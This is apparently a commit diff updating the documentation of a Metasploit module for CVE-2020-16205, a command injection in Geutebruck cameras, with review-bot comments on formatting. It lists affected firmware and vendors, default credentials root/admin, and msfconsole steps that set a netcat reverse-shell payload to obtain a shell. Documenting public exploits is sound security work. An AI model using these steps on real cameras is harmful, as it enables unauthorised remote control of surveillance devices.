Update geutebruck_testaction_exec.md
it should be better now :)
parent a14a2fe8d2
commit e4f760691e
|
@ -1,6 +1,7 @@
|
||||||
## Vulnerable Application
|
## Vulnerable Application
|
||||||
|
|
||||||
[Geutebruck](https://www.geutebrueck.com) Encoder and E2 Series Camera models:
|
The web interface of the following [Geutebruck](https://www.geutebrueck.com) products using firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5 "limited versions" are concerned:
|
||||||
|
Encoder and E2 Series Camera models:
|
||||||
G-Code:
|
G-Code:
|
||||||
EEC-2xxx
|
EEC-2xxx
|
||||||
G-Cam:
|
G-Cam:
|
||||||
|
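Review bot: The new opening sentence under "## Vulnerable Application" has a subject-verb mismatch ("The web interface of the following ... products ... are concerned") and its version range is hard to parse, since it is not clear whether "limited versions" applies to both 1.12.13.2 and 1.12.14.5 or only the latter. Suggest something like: "The web interface of the following Geutebruck products is affected when running firmware <= 1.12.0.25, or the 1.12.13.2 and 1.12.14.5 "limited versions":". The model names under "G-Code:" and "G-Cam:" also carry no list markers, so they will collapse into one paragraph when the markdown is rendered; prefix each model with "* " or "- ".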
@ -9,33 +10,48 @@ G-Cam:
|
||||||
ETHC-22xx
|
ETHC-22xx
|
||||||
EWPC-22xx
|
EWPC-22xx
|
||||||
|
|
||||||
|
Many brands use the same firmware:
|
||||||
|
UDP Technology (which is also the supplier of the firmware for the other vendors)
|
||||||
|
Ganz
|
||||||
|
Visualint
|
||||||
|
Cap
|
||||||
|
THRIVE Intelligence
|
||||||
|
Sophus
|
||||||
|
VCA
|
||||||
|
TripCorps
|
||||||
|
Sprinx Technologies
|
||||||
|
Smartec
|
||||||
|
Riva
|
||||||
|
|
||||||
|
This module has been tested on a Geutebruck 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware.
|
||||||
|
|
||||||
### Description
|
### Description
|
||||||
|
|
||||||
This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface of the Geutebruck G-Cam and G-Code products.
|
This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface of the Geutebruck G-Cam and G-Code products.
|
||||||
Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03
|
Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03
|
||||||
Tested it with the 1.12.14.5 firmware only.
|
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
List the steps needed to make sure this thing works
|
1. Start the camera using default configuration
|
||||||
|
2. Launch msfconsole
|
||||||
1. Do: `use exploit/linux/http/geutebruck_testaction_exec`
|
3. Do: `use exploit/linux/http/geutebruck_testaction_exec`
|
||||||
2. Do: `set httpusername root`
|
4. Do: `set httpusername root`
|
||||||
3. Do: `set httppassword admin`
|
5. Do: `set httppassword admin`
|
||||||
4. Do: `set lhost 192.168.14.1`
|
6. Do: `set lhost <metasploit_ip>`
|
||||||
5. Do: `set rhosts 192.168.14.58`
|
5. Do: `set rhosts <camera_ip>`
|
||||||
6. Do: `set payload cmd/unix/reverse_netcat_gaping`
|
6. Do: `set payload cmd/unix/reverse_netcat_gaping`
|
||||||
7. Do: `check`
|
7. Do: `check` to be sure the target is vulnerable
|
||||||
8. Do: `exploit`
|
8. Do: `exploit`
|
||||||
|
9. You should get a shell
|
||||||
|
|
||||||
## Options
|
## Options
|
||||||
|
|
||||||
### HTTPUSERNAME
|
The default credentials to log on the web interface are root/admin.
|
||||||
|
|
||||||
|
### HTTPUSERNAME
|
||||||
A username used to authenticate on the admin page. **Default: root**
|
A username used to authenticate on the admin page. **Default: root**
|
||||||
|
|
||||||
### HTTPPASSWORD
|
### HTTPPASSWORD
|
||||||
|
|
||||||
The password of the username used to authenticate on the admin page. **Default: admin**
|
The password of the username used to authenticate on the admin page. **Default: admin**
|
||||||
|
|
||||||
## Scenarios
|
## Scenarios
|
||||||
|
|
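Review bot: The renumbered Verification Steps list goes 1, 2, 3, 4, 5, 6 and then restarts at "5. Do: `set rhosts <camera_ip>`" and "6. Do: `set payload cmd/unix/reverse_netcat_gaping`", so the raw file has two steps 5 and two steps 6 and the final step is labelled 9 instead of 11. Renderers will renumber it, but anyone reading the source sees a broken sequence; please number the steps 1 through 11. In the same hunk, "The default credentials to log on the web interface are root/admin." now sits directly under "## Options" rather than with the setup steps or the "Vulnerable Application" section, the vendor names after "Many brands use the same firmware:" have no list markers, the Description still reads "This exploit a simple OS command injection" (should be "This module exploits"), and "## Scenarios" is left empty; a sample msfconsole run against the tested 1.12.14.5 firmware belongs there.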